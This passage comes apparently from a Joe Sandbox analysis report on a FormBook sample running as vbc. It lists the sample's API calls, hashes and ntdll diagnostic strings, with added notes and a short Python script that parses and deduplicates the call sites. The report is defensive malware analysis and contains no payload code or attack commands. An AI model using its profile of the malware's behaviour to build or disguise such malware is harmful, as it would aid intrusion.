                                                                                                                                                   • Note: this graph and the two preceding ones (entries 4082d3, 408309 and 408310) end in the same blocks 40835c-408392 and report the same PostThreadMessageW call site (ref 0040836A). They are three function definitions over one overlapping code region (three entry points into a shared tail), not three distinct call sites; the differing Opcode IDs and fuzzy hashes come from the differing entry blocks, so count this call once when tallying the payload's API usage.
                                                                                                                                                  APIs
                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                  • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                                  • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                                                  • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                                                  • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   • Basic blocks: 276 = 41a782-41a7aa (call 41af20); 278 = 41a7af-41a7c4 (LookupPrivilegeValueW)
                                                                                                                                                   • Edges: 276->278
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                                                  • Instruction ID: ec21d61b55864976568eadb485c386ae057cc9e8f9e3017aea6482977b845cb1
                                                                                                                                                  • Opcode Fuzzy Hash: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                                                  • Instruction Fuzzy Hash: C9E06DB5600205ABD620DF69DC80EE737AE9F58254F128165FA0DEB241DA39E8518BB4

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   • Basic blocks: 282 = 41a630-41a661 (call 41af20, RtlFreeHeap)
                                                                                                                                                   • Edges: none (single block)
                                                                                                                                                  APIs
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                  • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

                                                                                                                                                  Control-flow Graph

                                                                                                                                                   • Basic blocks: 285 = 41a790-41a7a9; 286 = 41a7af-41a7c4 (LookupPrivilegeValueW); 287 = 41a7aa (call 41af20)
                                                                                                                                                   • Edges: 285->286, 285->287, 287->286
                                                                                                                                                   • Note: same LookupPrivilegeValueW call site (ref 0041A7C0) as the function entered at 41a782 above; the two definitions overlap from 41a7aa onward and describe one call, not two.
                                                                                                                                                  APIs
                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                  • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                  APIs
                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                  • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
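The APIs lines in these records share one fixed shape, `Api.MODULE(arg,arg,...), ref: address`, with `?` for an argument the sandbox could not recover. The Python below is an added example, not output of the report or code from its author: it parses those lines, names the one constant that the API prototype lets us identify (the second argument of PostThreadMessageW is the message id, and 0x111 is WM_COMMAND in winuser.h), and collapses the records by call site so that the overlapping function definitions noted above are counted once. The sample lines are copied from this section; the WINDOW_MESSAGES table is deliberately limited to the value seen here and would be extended for other samples.

```python
import re
from collections import defaultdict

# Constructed input: the seven APIs lines of the 00400000 dump in this section, verbatim.
API_LINES = [
    "PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A",
    "PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A",
    "PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A",
    "LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0",
    "RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D",
    "LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0",
    "ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698",
]

LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Window-message ids we can name; only the value present in this sample (winuser.h).
WINDOW_MESSAGES = {0x0111: "WM_COMMAND"}


def parse_api_line(line):
    """Split one APIs line into api, module, argument list and call-site address.

    Arguments are the sandbox's stack snapshot at the call, so their count need not
    match the prototype; '?' becomes None (value not recovered).
    """
    m = LINE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    args = []
    for a in m.group("args").split(","):
        a = a.strip()
        args.append(None if a == "?" else int(a, 16))
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": args,
        "ref": int(m.group("ref"), 16),
    }


def annotate(call):
    """Name constants identifiable from the API prototype; returns a list of notes."""
    notes = []
    if call["api"] == "PostThreadMessageW" and len(call["args"]) >= 2 and call["args"][1] is not None:
        msg = call["args"][1]                     # PostThreadMessageW(idThread, Msg, wParam, lParam)
        notes.append(f"Msg=0x{msg:04X} ({WINDOW_MESSAGES.get(msg, 'unknown')})")
    return notes


def distinct_call_sites(lines):
    """Collapse repeated records: a call site that lies in the shared tail of several
    overlapping function definitions is listed once per function. Returns {ref: (api, count)}."""
    sites = defaultdict(lambda: [None, 0])
    for line in lines:
        c = parse_api_line(line)
        sites[c["ref"]][0] = c["api"]
        sites[c["ref"]][1] += 1
    return {ref: (api, n) for ref, (api, n) in sites.items()}


if __name__ == "__main__":
    for ref, (api, n) in sorted(distinct_call_sites(API_LINES).items()):
        print(f"{ref:08X} {api:<22} reported {n}x")
    print(annotate(parse_api_line(API_LINES[0])))
```

Run against the lines above this yields four call sites (0040836A, 0041A65D, 0041A698, 0041A7C0) from seven records, and flags the PostThreadMessageW message as WM_COMMAND with wParam and lParam both zero.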
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: a33a1ff874c0f60062ad232198c744d3edb1f12d1410ea23a365fabe32a746fb
                                                                                                                                                  • Instruction ID: bf6bc76698db40be18cc2aba0f61c452f9845c23168d4ec137df5b29ca97d77d
                                                                                                                                                  • Opcode Fuzzy Hash: a33a1ff874c0f60062ad232198c744d3edb1f12d1410ea23a365fabe32a746fb
                                                                                                                                                  • Instruction Fuzzy Hash: F5B09B729015C5C5EE15F760460CB37791177D1705F55C461D2034745E4738C1D1E176
                                                                                                                                                   Strings
                                                                                                                                                   • Note: the strings below are ntdll's own diagnostic format strings (stack-buffer-overrun, critical-section and resource-timeout, and access-violation reports), so the 05C10000 region ("based on PE: true") indicates a copy of ntdll in the process rather than FormBook's own code; confirm from the dump's PE header and export table before spending analysis time on this region, and keep the 00400000 dump as the payload of interest.
                                                                                                                                                  • a NULL pointer, xrefs: 05CF8F90
                                                                                                                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 05CF8DB5
                                                                                                                                                  • The instruction at %p referenced memory at %p., xrefs: 05CF8EE2
                                                                                                                                                  • write to, xrefs: 05CF8F56
                                                                                                                                                  • The instruction at %p tried to %s , xrefs: 05CF8F66
                                                                                                                                                  • The resource is owned shared by %d threads, xrefs: 05CF8E2E
                                                                                                                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 05CF8FEF
                                                                                                                                                  • This failed because of error %Ix., xrefs: 05CF8EF6
• an invalid address, %p, xrefs: 05CF8F7F
• *** An Access Violation occurred in %ws:%s, xrefs: 05CF8F3F
• *** Resource timeout (%p) in %ws:%s, xrefs: 05CF8E02
• read from, xrefs: 05CF8F5D, 05CF8F62
• *** then kb to get the faulting stack, xrefs: 05CF8FCC
• The critical section is owned by thread %p., xrefs: 05CF8E69
• This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 05CF8F34
• *** Critical Section Timeout (%p) in %ws:%s, xrefs: 05CF8E4B
• This means that the I/O device reported an I/O error. Check your hardware., xrefs: 05CF8F26
• If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 05CF8DC4
• The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05CF8E86
• *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 05CF8D8C
• *** enter .exr %p for the exception record, xrefs: 05CF8FA1
• <unknown>, xrefs: 05CF8D2E, 05CF8D81, 05CF8E00, 05CF8E49, 05CF8EC7, 05CF8F3E
• Go determine why that thread has not released the critical section., xrefs: 05CF8E75
• *** enter .cxr %p for the context, xrefs: 05CF8FBD
• The resource is owned exclusively by thread %p, xrefs: 05CF8E24
• The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 05CF8DD3
• *** A stack buffer overrun occurred in %ws:%s, xrefs: 05CF8DA3
• This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 05CF8F2D
• The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 05CF8E3F
• *** Inpage error in %ws:%s, xrefs: 05CF8EC8
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
• API String ID: 0-108210295
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
Strings
• Address of the debug info found in the active list., xrefs: 05CB54AE, 05CB54FA
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CB54CE
• Invalid debug info address of this critical section, xrefs: 05CB54B6
• 8, xrefs: 05CB52E3
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CB540A, 05CB5496, 05CB5519
• Thread identifier, xrefs: 05CB553A
• corrupted critical section, xrefs: 05CB54C2
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CB54E2
• double initialized or corrupted critical section, xrefs: 05CB5508
• undeleted critical section in freed memory, xrefs: 05CB542B
• Critical section debug info address, xrefs: 05CB541F, 05CB552E
• Thread is in a state in which it cannot own a critical section, xrefs: 05CB5543
• Critical section address, xrefs: 05CB5425, 05CB54BC, 05CB5534
• Critical section address., xrefs: 05CB5502
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
• API String ID: 0-3197712848
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
• API String ID: 0-1357697941
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
• API String ID: 0-664215390
Strings
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 05CB292E
• SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 05CB2881
• SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 05CB2856
• @, xrefs: 05C73180
• RtlpProbeAssemblyStorageRootForAssembly, xrefs: 05CB29AC
• SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 05CB29B1
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 05CB28B2
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
Similarity
• API ID:
• String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
• API String ID: 0-541586583
Strings
• minkernel\ntdll\ldrutil.c, xrefs: 05CC4E06
• LdrpProtectedCopyMemory, xrefs: 05CC4DF4
• Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 05CC4E38
• LdrpGenericExceptionFilter, xrefs: 05CC4DFC
• Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 05CC4DF5
• ***Exception thrown within loader***, xrefs: 05CC4E27
• Execute '.cxr %p' to dump context, xrefs: 05CC4EB1
Memory Dump Source
• Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                                                                  • API String ID: 0-2973941816
                                                                                                                                                  • Opcode ID: 1aeb4238c571c7faf650297d5d46c621c7fed9149b79291c8acca0f4b86cbe8c
                                                                                                                                                  • Instruction ID: c8521eb13290e8597198f30fb10a4d3f99b7ddcf984f771b13146c5a0227446e
                                                                                                                                                  • Opcode Fuzzy Hash: 1aeb4238c571c7faf650297d5d46c621c7fed9149b79291c8acca0f4b86cbe8c
                                                                                                                                                  • Instruction Fuzzy Hash: A0217972244150BBDF2C9A6C8CDAD36BF99FB43D51F154CADF01296580C960DE00D260
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-792281065
                                                                                                                                                  • Opcode ID: 0f8ca5f4284abd7d237489b5f8a832d4f5aa822cd12a9fea83a1cc37af5f3edb
                                                                                                                                                  • Instruction ID: 6914903b9cadb9af6134943c67883380baf4fee266308ab744aedc7d485a3083
                                                                                                                                                  • Opcode Fuzzy Hash: 0f8ca5f4284abd7d237489b5f8a832d4f5aa822cd12a9fea83a1cc37af5f3edb
                                                                                                                                                  • Instruction Fuzzy Hash: 61915170B0C7159BEF28DF58E889BA97FA2FF01B14F040C69E40267781DBB49941E791
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 05C72E4D
                                                                                                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 05CB2706
                                                                                                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 05CB279C
                                                                                                                                                  • .Local\, xrefs: 05C72D91
                                                                                                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 05CB276F
                                                                                                                                                  • \WinSxS\, xrefs: 05C72E23
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                                                                  • API String ID: 0-3926108909
                                                                                                                                                  • Opcode ID: 722d3fffb66f9bed4d5028f0acbbc9f309e814cc53298e5ae429d56f98dc5ce1
                                                                                                                                                  • Instruction ID: cd71e0336fb9db52690c6e16012d28c96303333932644317894f7ed1226261fc
                                                                                                                                                  • Opcode Fuzzy Hash: 722d3fffb66f9bed4d5028f0acbbc9f309e814cc53298e5ae429d56f98dc5ce1
                                                                                                                                                  • Instruction Fuzzy Hash: 2681CA792083419BDB11CF19C884AABB7E9FF95700F448C5DF885DB241D7B4DA40CBA2
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitShimEngine, xrefs: 05C999F4, 05C99A07, 05C99A30
                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05C99A01
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C99A11, 05C99A3A
                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05C99A2A
                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 05C999ED
                                                                                                                                                  • apphelp.dll, xrefs: 05C36496
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                  • Opcode ID: 2e2ac5e66d8854b4aba810926afefb1255032bd29665390ab8572dc1477f59de
                                                                                                                                                  • Instruction ID: 0d5e78beb4ef9c8d5d5a3c17e7c06f8a2d286cba1d0b62d3c4fc611363939e40
                                                                                                                                                  • Opcode Fuzzy Hash: 2e2ac5e66d8854b4aba810926afefb1255032bd29665390ab8572dc1477f59de
                                                                                                                                                  • Instruction Fuzzy Hash: BD51B571318304AFD725DF28D84AB6B7BE9FB84644F000D2EF58697250DA30EA44DB97
                                                                                                                                                  Strings
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 05CB8181, 05CB81F5
                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 05CB81E5
                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 05CB8170
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C7C6C3
                                                                                                                                                  • LdrpInitializeProcess, xrefs: 05C7C6C4
                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 05CB8177, 05CB81EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                  • Opcode ID: b09d41a1cb57441e4d00040ed6d745195fcf42495be46e0d320575aa0da504dd
                                                                                                                                                  • Instruction ID: f3fe1a4968d8aabf848bc54d9708327c515f8b048e6c0931444b957cf44925ca
                                                                                                                                                  • Opcode Fuzzy Hash: b09d41a1cb57441e4d00040ed6d745195fcf42495be46e0d320575aa0da504dd
                                                                                                                                                  • Instruction Fuzzy Hash: D7311771748345ABD310EF28DD8BE6A7BD9EF84B14F040D68F845AB391DA60DD04D7A2
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 05CB21BF
